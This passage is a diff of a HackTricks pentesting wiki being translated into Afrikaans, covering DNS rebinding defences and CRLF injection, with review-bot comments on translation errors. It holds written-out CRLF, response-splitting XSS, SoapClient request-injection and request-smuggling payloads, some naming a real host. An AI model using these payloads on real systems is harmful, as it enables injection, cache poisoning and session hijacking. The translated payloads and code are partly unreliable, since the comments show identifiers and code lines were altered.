State of DNS Rebinding Attacks & Singularity of Origin - DEF CON 27 Conference](https://www.youtube.com/watch?v=y9-0lICNjOQ). 
-* If **internal IPs aren't allowed**, they might **forgot forbidding 0.0.0.0** (works on Linux and Mac) -* If **internal IPs aren't allowed**, respond with a **CNAME** to **localhost** (works on Linux and Ma -* If **internal IPs aren't allowed** as DNS responses, you can respond **CNAMEs to internal services** such as www.corporate.internal. +[**`Singularity of Origin`**](https://github.com/nccgroup/singularity) is 'n instrument om [DNS rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding) aanvalle uit te voer. Dit sluit die nodige komponente in om die IP-adres van die aanvalbediener se DNS-naam te herbind na die teikermasjien se IP-adres en om aanvalspakketten te bedien om kwesbare sagteware op die teikermasjien uit te buit. -### DNS Rebidding Weaponized +### Werklike beskerming teen DNS Rebinding -You can find more information about the previous bypass techniques and how to use the following tool in the talk [Gerald Doussot - State of DNS Rebinding Attacks & Singularity of Origin - DEF CON 27 Conference](https://www.youtube.com/watch?v=y9-0lICNjOQ). +* Gebruik TLS in interne dienste +* Versoek verifikasie om toegang tot data te verkry +* Valideer die Host-kop +* [https://wicg.github.io/private-network-access/](https://wicg.github.io/private-network-access/): Voorstel om altyd 'n voorafgaande versoek te stuur wanneer openbare bedieners toegang tot interne bedieners wil verkry -[**`Singularity of Origin`**](https://github.com/nccgroup/singularity) is a tool to perform [DNS rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding) attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine. 
+## **Instrumente** -### Real Protection against DNS Rebinding - -* Use TLS in internal services -* Request authentication to access data -* Validate the Host header -* [https://wicg.github.io/private-network-access/](https://wicg.github.io/private-network-access/): Proposal to always send a pre-flight request when public servers want to access internal servers - -## **Tools** - -**Fuzz possible misconfigurations in CORS policies** +**Fuzz moontlike verkeerde konfigurasies in CORS-beleide** * [https://github.com/chenjj/CORScanner](https://github.com/chenjj/CORScanner) * [https://github.com/lc/theftfuzzer](https://github.com/lc/theftfuzzer) * [https://github.com/s0md3v/Corsy](https://github.com/s0md3v/Corsy) * [https://github.com/Shivangx01b/CorsMe](https://github.com/Shivangx01b/CorsMe) -## References +## Verwysings * [https://portswigger.net/web-security/cors](https://portswigger.net/web-security/cors) * [https://portswigger.net/web-security/cors/access-control-allow-origin](https://portswigger.net/web-security/cors/access-control-allow-origin) * [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers#CORS](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers#CORS) @@ -405,14 +378,14 @@ You can find more information about the previous bypass techniques and how to us
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks in PDF aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
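Review bot: the warning hint in the DNS Rebinding via cache section is truncated and left unclosed in the first hunk. The translated line stops mid-word at `Verskaffers soos godaddy of cloudflare het my nie toeg`, the `-{% endhint %}` deletion has no `+{% endhint %}` counterpart, and the `For more info you can check https://unit42.paloaltonetworks.com/dns-rebinding/` reference that followed the hint is dropped. Complete the sentence from the English source (the 0.0.0.0 / AWS route53 remark), put `{% endhint %}` back before `### Ander algemene omseilings`, and keep the unit42 link; as committed, the open hint block swallows the following sections when GitBook renders the page. Smaller points: `teikermasjien` should be `teikenmasjien`, `aanvalspakketten` should be `aanvalspakkette`, and the English typo `Rebidding` was carried into `### Gewapende DNS Rebidding`.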
diff --git a/pentesting-web/crlf-0d-0a.md b/pentesting-web/crlf-0d-0a.md index 213473aa6..0e6bff2e6 100644 --- a/pentesting-web/crlf-0d-0a.md +++ b/pentesting-web/crlf-0d-0a.md @@ -1,214 +1,193 @@ -# CRLF (%0D%0A) Injection +# CRLF (%0D%0A) Injeksie
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en mondelinge Pools vereis_). {% embed url="https://www.stmcyber.com/careers" %} ### CRLF -Carriage Return (CR) and Line Feed (LF), collectively known as CRLF, are special character sequences used in the HTTP protocol to denote the end of a line or the start of a new one. Web servers and browsers use CRLF to distinguish between HTTP headers and the body of a response. These characters are universally employed in HTTP/1.1 communications across various web server types, such as Apache and Microsoft IIS. +Carriage Return (CR) en Line Feed (LF), algemeen bekend as CRLF, is spesiale karakterreeks wat in die HTTP-protokol gebruik word om die einde van 'n lyn of die begin van 'n nuwe een aan te dui. Webbedieners en webblaaier gebruik CRLF om onderskeid te maak tussen HTTP-koppe en die liggaam van 'n respons. Hierdie karakters word universeel gebruik in HTTP/1.1-kommunikasie oor verskillende tipes webbedieners, soos Apache en Microsoft IIS. -### CRLF Injection Vulnerability +### CRLF Injeksiekwesbaarheid -CRLF injection involves the insertion of CR and LF characters into user-supplied input. This action misleads the server, application, or user into interpreting the injected sequence as the end of one response and the beginning of another. While these characters are not inherently harmful, their misuse can lead to HTTP response splitting and other malicious activities. +CRLF-injeksie behels die invoeging van CR- en LF-karakters in gebruikersverskafte insette. Hierdie aksie mislei die bediener, toepassing of gebruiker om die ingespotte volgorde te interpreteer as die einde van een respons en die begin van 'n ander. 
Alhoewel hierdie karakters nie inherent skadelik is nie, kan hul misbruik lei tot HTTP-responsverdeling en ander skadelike aktiwiteite. -### Example: CRLF Injection in a Log File +### Voorbeeld: CRLF-injeksie in 'n Loglêer -[Example from here](https://www.invicti.com/blog/web-security/crlf-http-header/) - -Consider a log file in an admin panel that follows the format: `IP - Time - Visited Path`. A typical entry might look like: +[Voorbeeld van hier](https://www.invicti.com/blog/web-security/crlf-http-header/) +Beskou 'n loglêer in 'n administratiewe paneel wat die formaat volg: `IP - Tyd - Besoekte Pad`. 'n Tipiese inskrywing kan lyk soos: ``` 123.123.123.123 - 08:15 - /index.php?page=home ``` - -An attacker can exploit a CRLF injection to manipulate this log. By injecting CRLF characters into the HTTP request, the attacker can alter the output stream and fabricate log entries. For instance, an injected sequence might transform the log entry into: - +'n Aanvaller kan 'n CRLF-inspuiting benut om hierdie log te manipuleer. Deur CRLF-karakters in die HTTP-versoek in te spuit, kan die aanvaller die uitvoerstroom verander en loginskrywings vervals. Byvoorbeeld, 'n ingespotte reeks kan die loginskrywing transformeer na: ' ``` /index.php?page=home&%0d%0a127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit ``` - -Here, `%0d` and `%0a` represent the URL-encoded forms of CR and LF. Post-attack, the log would misleadingly display: - +Hier, `%0d` en `%0a` verteenwoordig die URL-gekodeerde vorms van CR en LF. Na die aanval sal die log misleidend wys: ``` IP - Time - Visited Path 123.123.123.123 - 08:15 - /index.php?page=home& 127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit ``` - -The attacker thus cloaks their malicious activities by making it appear as if the localhost (an entity typically trusted within the server environment) performed the actions. 
The server interprets the part of the query starting with `%0d%0a` as a single parameter, while the `restrictedaction` parameter is parsed as another, separate input. The manipulated query effectively mimics a legitimate administrative command: `/index.php?page=home&restrictedaction=edit` +Die aanvaller vermom dus hul skadelike aktiwiteite deur dit te laat lyk asof die localhost (‘n entiteit wat tipies vertrou word binne die bedieneromgewing) die aksies uitgevoer het. Die bediener interpreteer die gedeelte van die navraag wat begin met `%0d%0a` as 'n enkele parameter, terwyl die `restrictedaction` parameter as 'n ander, afsonderlike inset geanaliseer word. Die gemanipuleerde navraag boots effektief 'n legitieme administratiewe bevel na: `/index.php?page=home&restrictedaction=edit` -### HTTP Response Splitting +### HTTP-reaksiesplitsing -#### Description +#### Beskrywing -HTTP Response Splitting is a security vulnerability that arises when an attacker exploits the structure of HTTP responses. This structure separates headers from the body using a specific character sequence, Carriage Return (CR) followed by Line Feed (LF), collectively termed as CRLF. If an attacker manages to insert a CRLF sequence into a response header, they can effectively manipulate the subsequent response content. This type of manipulation can lead to severe security issues, notably Cross-site Scripting (XSS). +HTTP-reaksiesplitsing is 'n sekuriteitskwesbaarheid wat ontstaan wanneer 'n aanvaller die struktuur van HTTP-reaksies uitbuit. Hierdie struktuur skei koppe van die liggaam deur 'n spesifieke karaktervolgorde, Carriage Return (CR) gevolg deur Line Feed (LF), wat gesamentlik as CRLF bekend staan. As 'n aanvaller daarin slaag om 'n CRLF-volgorde in 'n reaksiekop in te voeg, kan hulle die daaropvolgende reaksie-inhoud effektief manipuleer. Hierdie tipe manipulasie kan lei tot ernstige sekuriteitskwessies, veral Cross-site Scripting (XSS). 
-#### XSS through HTTP Response Splitting +#### XSS deur HTTP-reaksiesplitsing -1. The application sets a custom header like this: `X-Custom-Header: UserInput` -2. The application fetches the value for `UserInput` from a query parameter, say "user_input". In scenarios lacking proper input validation and encoding, an attacker can craft a payload that includes the CRLF sequence, followed by malicious content. -3. An attacker crafts a URL with a specially crafted 'user_input': `?user_input=Value%0d%0a%0d%0a` - - In this URL, `%0d%0a%0d%0a` is the URL-encoded form of CRLFCRLF. It tricks the server into inserting a CRLF sequence, making the server treat the subsequent part as the response body. -4. The server reflects the attacker's input in the response header, leading to an unintended response structure where the malicious script is interpreted by the browser as part of the response body. +1. Die toepassing stel 'n aangepaste kop soos volg in: `X-Aangepaste-Kop: GebruikerInvoer` +2. Die toepassing haal die waarde vir `GebruikerInvoer` uit 'n navraagparameter, sê "gebruiker_invoer". In scenario's waar behoorlike insetvalidering en kodering ontbreek, kan 'n aanvaller 'n lading skep wat die CRLF-volgorde insluit, gevolg deur skadelike inhoud. +3. 'n Aanvaller skep 'n URL met 'n spesiaal vervaardigde 'gebruiker_invoer': `?gebruiker_invoer=Waarde%0d%0a%0d%0a` +- In hierdie URL is `%0d%0a%0d%0a` die URL-gekodeerde vorm van CRLFCRLF. Dit mislei die bediener om 'n CRLF-volgorde in te voeg, sodat die bediener die daaropvolgende gedeelte as die reaksie-liggaam hanteer. +4. Die bediener weerspieël die aanvaller se inset in die reaksiekop, wat lei tot 'n onbedoelde reaksie-struktuur waar die skadelike skrips deur die blaaier geïnterpreteer word as deel van die reaksie-liggaam. 
-#### An example of HTTP Response Splitting leading to Redirect +#### 'n Voorbeeld van HTTP-reaksiesplitsing wat tot 'n omleiding lei -From [https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62](https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62) - -Browser to: +Vanaf [https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62](https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62) +Blaaier na: ``` /%0d%0aLocation:%20http://myweb.com ``` - -And the server responses with the header: - +En die bediener reageer met die kop: ``` Location: http://myweb.com ``` - -**Other example: (from** [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)**)** - +**Ander voorbeeld: (vanaf** [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)**)** ``` http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E ``` +#### In URL Pad -#### In URL Path - -You can send the payload **inside the URL path** to control the **response** from the server (example from [here](https://hackerone.com/reports/192667)): - +Jy kan die payload **binne die URL-pad** stuur om die **respons** van die bediener te beheer (voorbeeld van [hier](https://hackerone.com/reports/192667)): ``` http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E 
http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E ``` - -Check more examples in: +Kyk na meer voorbeelde in: {% embed url="https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md" %} -### HTTP Header Injection +### HTTP Kopinjeksie -HTTP Header Injection, often exploited through CRLF (Carriage Return and Line Feed) injection, allows attackers to insert HTTP headers. This can undermine security mechanisms such as XSS (Cross-Site Scripting) filters or the SOP (Same-Origin Policy), potentially leading to unauthorized access to sensitive data, such as CSRF tokens, or the manipulation of user sessions through cookie planting. +HTTP Kopinjeksie, dikwels uitgebuit deur CRLF (Carriage Return en Line Feed) injeksie, stel aanvallers in staat om HTTP koppe in te voeg. Dit kan sekuriteitsmeganismes soos XSS (Cross-Site Scripting) filters of die SOP (Same-Origin Policy) ondermyn, wat moontlik kan lei tot ongemagtigde toegang tot sensitiewe data, soos CSRF tokens, of die manipulasie van gebruikersessies deur middel van koekieplanting. -#### Exploiting CORS via HTTP Header Injection +#### Uitbuiting van CORS via HTTP Kopinjeksie -An attacker can inject HTTP headers to enable CORS (Cross-Origin Resource Sharing), bypassing the restrictions imposed by SOP. This breach allows scripts from malicious origins to interact with resources from a different origin, potentially accessing protected data. +'n Aanvaller kan HTTP koppe inspuit om CORS (Cross-Origin Resource Sharing) moontlik te maak, deur die beperkings wat deur SOP opgelê word, te omseil. Hierdie oortreding maak dit vir skrips van skadelike oorsprong moontlik om met hulpbronne van 'n ander oorsprong te interaksieer, wat moontlik toegang tot beskermde data kan gee. 
-#### SSRF and HTTP Request Injection via CRLF - -CRLF injection can be utilized to craft and inject an entirely new HTTP request. A notable example of this is the vulnerability in PHP's `SoapClient` class, specifically within the `user_agent` parameter. By manipulating this parameter, an attacker can insert additional headers and body content, or even inject a new HTTP request entirely. Below is a PHP example demonstrating this exploitation: +#### SSRF en HTTP Versoekinjeksie via CRLF +CRLF-injeksie kan gebruik word om 'n heeltemal nuwe HTTP-versoek te skep en in te spuit. 'n Noemenswaardige voorbeeld hiervan is die kwesbaarheid in PHP se `SoapClient`-klas, spesifiek binne die `user_agent`-parameter. Deur hierdie parameter te manipuleer, kan 'n aanvaller bykomende koppe en liggaamsinhoud invoeg, of selfs 'n heeltemal nuwe HTTP-versoek inspuit. Hieronder is 'n PHP-voorbeeld wat hierdie uitbuiting demonstreer: ```php -$target = 'http://127.0.0.1:9090/test'; +$target = 'http://127.0.0.1:9090/test'; $post_string = 'variable=post value'; $crlf = array( - 'POST /proxy HTTP/1.1', - 'Host: local.host.htb', - 'Cookie: PHPSESSID=[PHPSESSID]', - 'Content-Type: application/x-www-form-urlencoded', - 'Content-Length: '.(string)strlen($post_string), - "\r\n", - $post_string +'POST /proxy HTTP/1.1', +'Host: local.host.htb', +'Cookie: PHPSESSID=[PHPSESSID]', +'Content-Type: application/x-www-form-urlencoded', +'Content-Length: '.(string)strlen($post_string), +"\r\n", +$post_string ); $client = new SoapClient(null, - array( - 'uri'=>$target, - 'location'=>$target, - 'user_agent'=>"IGN\r\n\r\n".join("\r\n",$crlf) - ) +array( +'uri'=>$target, +'location'=>$target, +'user_agent'=>"IGN\r\n\r\n".join("\r\n",$crlf) +) ); # Put a netcat listener on port 9090 $client->__soapCall("test", []); ``` +### Invoeging van koptekste om versoeksmokkeling te doen -### Header Injection to Request Smuggling - -For more info about this technique and potential problems [**check the original 
source**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning). - -You can inject essential headers to ensure the **back-end keeps the connection open** after responding to the initial request: +Vir meer inligting oor hierdie tegniek en potensiële probleme [**kyk na die oorspronklike bron**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning). +Jy kan noodsaaklike koptekste invoeg om te verseker dat die **agterste gedeelte die verbinding oop hou** nadat dit op die aanvanklike versoek gereageer het: ``` GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0a HTTP/1.1 ``` +Daarna kan 'n tweede versoek gespesifiseer word. Hierdie scenario behels gewoonlik [HTTP-versoeksmokkelary](http-request-smuggling/), 'n tegniek waar ekstra koppe of liggaamselemente wat deur die bediener na inspuiting bygevoeg word, kan lei tot verskeie sekuriteitskwessies. -Afterward, a second request can be specified. This scenario typically involves [HTTP request smuggling](http-request-smuggling/), a technique where extra headers or body elements appended by the server post-injection can lead to various security exploits. +**Uitbuiting:** -**Exploitation:** - - -1. **Malicious Prefix Injection**: This method involves poisoning the next user's request or a web cache by specifying a malicious prefix. An example of this is: +1. **Boosaardige Voorvoegselinspuiting**: Hierdie metode behels die vergiftiging van die volgende gebruiker se versoek of 'n webgeheue deur 'n boosaardige voorvoegsel te spesifiseer. 'n Voorbeeld hiervan is: `GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/redirplz%20HTTP/1.1%0d%0aHost:%20oastify.com%0d%0a%0d%0aContent-Length:%2050%0d%0a%0d%0a HTTP/1.1` -2. 
**Crafting a Prefix for Response Queue Poisoning**: This approach involves creating a prefix that, when combined with trailing junk, forms a complete second request. This can trigger response queue poisoning. An example is: +2. **Skep 'n Voorvoegsel vir Vergiftiging van Reaksie-ry**: Hierdie benadering behels die skep van 'n voorvoegsel wat, wanneer dit gekombineer word met oorblywende rommel, 'n volledige tweede versoek vorm. Dit kan reaksie-ry-vergiftiging teweegbring. 'n Voorbeeld hiervan is: `GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/%20HTTP/1.1%0d%0aFoo:%20bar HTTP/1.1` -### Memcache Injection +### Memcache-inspuiting -Memcache is a **key-value store that uses a clear text protocol**. More info in: +Memcache is 'n **sleutel-waarde-stoor wat 'n duidelike teksprotokol gebruik**. Meer inligting in: {% content-ref url="../network-services-pentesting/11211-memcache/" %} [11211-memcache](../network-services-pentesting/11211-memcache/) {% endcontent-ref %} -**For the full information read the**[ **original writeup**](https://www.sonarsource.com/blog/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/) +**Vir die volledige inligting lees die**[ **oorspronklike skryfstuk**](https://www.sonarsource.com/blog/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/) -If a platform is taking **data from an HTTP request and using it without sanitizing** it to perform **requests** to a **memcache** server, an attacker could abuse this behaviour to **inject new memcache commands**. +As 'n platform **data van 'n HTTP-versoek neem en dit sonder sanitasie** gebruik om **versoeke** na 'n **memcache**-bediener uit te voer, kan 'n aanvaller hierdie gedrag misbruik om **nuwe memcache-opdragte in te spuit**. 
-For example, in the original discovered vuln, cache keys were used to return the IP and port a user shuold connect to, and attackers were able to **inject memcache comands** that would **poison** the **cache to send the vistims details** (usrnames and passwords included) to the attacker servers: +Byvoorbeeld, in die oorspronklike ontdekte kwesbaarheid is kas-sleutels gebruik om die IP en poort terug te gee waaraan 'n gebruiker moet koppel, en aanvallers kon **memcache-opdragte inspuit** wat die **kas sou vergiftig om die slagoffers se besonderhede** (gebruikersname en wagwoorde ingesluit) na die aanvaller se bedieners te stuur:
https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/ba72cd16-2ca0-447b-aa70-5cde302a0b88/body-578d9f9f-1977-4e34-841c-ad870492328f_10.png?w=1322&h=178&auto=format&fit=crop
-Moreover, researchers also discovered that they could desync the memcache responses to send the attackers ip and ports to users whose email the attacker didn't know: +Verder het navorsers ook ontdek dat hulle die memcache-responsies kon desinkroniseer om die aanvallers se IP en poorte na gebruikers te stuur wie se e-pos die aanvaller nie geken het nie:
https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/c6c1f3c4-d244-4bd9-93f7-2c88f139acfa/body-3f9ceeb9-3d6b-4867-a23f-e0e50a46a2e9_14.png?w=1322&h=506&auto=format&fit=crop
-### How to Prevent CRLF / HTTP Header Injections in Web Applications +### Hoe om CRLF / HTTP-kopinspuitings in webtoepassings te voorkom -To mitigate the risks of CRLF (Carriage Return and Line Feed) or HTTP Header Injections in web applications, the following strategies are recommended: +Om die risiko van CRLF (Carriage Return en Line Feed) of HTTP-kopinspuitings in webtoepassings te verminder, word die volgende strategieë aanbeveel: -1. **Avoid Direct User Input in Response Headers:** - The safest approach is to refrain from incorporating user-supplied input directly into response headers. +1. **Vermy Direkte Gebruikersinvoer in Reaksiekoppe:** +Die veiligste benadering is om te vermy dat gebruikersverskafte insette direk in reaksiekoppe opgeneem word. -2. **Encode Special Characters:** - If avoiding direct user input is not feasible, ensure to employ a function dedicated to encoding special characters like CR (Carriage Return) and LF (Line Feed). This practice prevents the possibility of CRLF injection. +2. **Kodeer Spesiale Karakters:** +As dit nie moontlik is om direkte gebruikersinvoer te vermy nie, moet 'n funksie wat spesiale karakters soos CR (Carriage Return) en LF (Line Feed) kodeer, gebruik word. Hierdie praktyk voorkom die moontlikheid van CRLF-inspuiting. -3. **Update Programming Language:** - Regularly update the programming language used in your web applications to the latest version. Opt for a version that inherently disallows the injection of CR and LF characters within functions tasked with setting HTTP headers. +3. **Werk die Programmeer- taal op:** +Werk gereeld die programmeertaal wat in jou webtoepassings gebruik word na die nuutste weergawe. Kies 'n weergawe wat die inspuiting van CR- en LF-karakters binne funksies wat HTTP-koppe stel, inherent verbied. 
+### SPOEDKAART -### CHEATSHEET - -[Cheatsheet from here](https://twitter.com/NinadMishra5/status/1650080604174667777) - +[Spoedkaart van hier](https://twitter.com/NinadMishra5/status/1650080604174667777) ``` 1. HTTP Response Splitting • /%0D%0ASet-Cookie:mycookie=myvalue (Check if the response is setting this cookie) 2. CRLF chained with Open Redirect -• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2 +• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2 • /www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2 • /google.com/%2F..%0D%0AHeader-Test:test2 • /%0d%0aLocation:%20http://example.com @@ -224,17 +203,16 @@ To mitigate the risks of CRLF (Carriage Return and Line Feed) or HTTP Header Inj • %E5%98%BC = %3C = \u563c (<) • Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test ``` - -## Automatic Tools +## Outomatiese Gereedskap * [https://github.com/Raghavd3v/CRLFsuite](https://github.com/Raghavd3v/CRLFsuite) * [https://github.com/dwisiswant0/crlfuzz](https://github.com/dwisiswant0/crlfuzz) -## Brute-Force Detection List +## Brute-Force Deteksie Lys * [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt](https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt) -## References +## Verwysings * [**https://www.invicti.com/blog/web-security/crlf-http-header/**](https://www.invicti.com/blog/web-security/crlf-http-header/) * [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/) * [**https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning) 
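Review bot: the translation rewrites code and inline identifiers that must stay verbatim. In the XSS through HTTP Response Splitting steps, `X-Custom-Header: UserInput`, `user_input` and `?user_input=Value%0d%0a%0d%0a` became `X-Aangepaste-Kop: GebruikerInvoer`, `gebruiker_invoer` and `?gebruiker_invoer=Waarde%0d%0a%0d%0a`; these are literal header names and query parameters, so the translated payload no longer matches what the text describes. The PHP `SoapClient` block lost its indentation on every array element line (`'POST /proxy HTTP/1.1',` down to `$post_string`) and on the `array(` block, the `$target = 'http://127.0.0.1:9090/test';` line was touched, and one line inside the cheatsheet fence (`• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2`) was modified; fenced blocks should be excluded from the translation pass entirely. Formatting points: a stray `'` follows `transformeer na:` right before the first code fence; the continuation lines under `1. **Vermy Direkte Gebruikersinvoer in Reaksiekoppe:**` (and items 2 and 3) and the `- In hierdie URL` sub-item lost their leading spaces, so they no longer nest under their list items; `Programmeer- taal` has a stray hyphen; `IP - Tyd - Besoekte Pad` no longer matches the untranslated `IP - Time - Visited Path` header shown in the sample log output; and `SPOEDKAART` does not translate `CHEATSHEET` (`SPIEKBRIEF` would).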
@@ -242,20 +220,20 @@ To mitigate the risks of CRLF (Carriage Return and Line Feed) or HTTP Header Inj -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hacking loopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende Pools skriftelik en mondeling benodig_). {% embed url="https://www.stmcyber.com/careers" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
